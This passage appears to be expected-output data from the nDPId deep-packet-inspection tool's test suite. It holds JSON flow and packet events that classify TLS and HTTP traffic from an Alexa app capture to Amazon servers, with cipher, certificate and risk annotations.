{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01106{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} 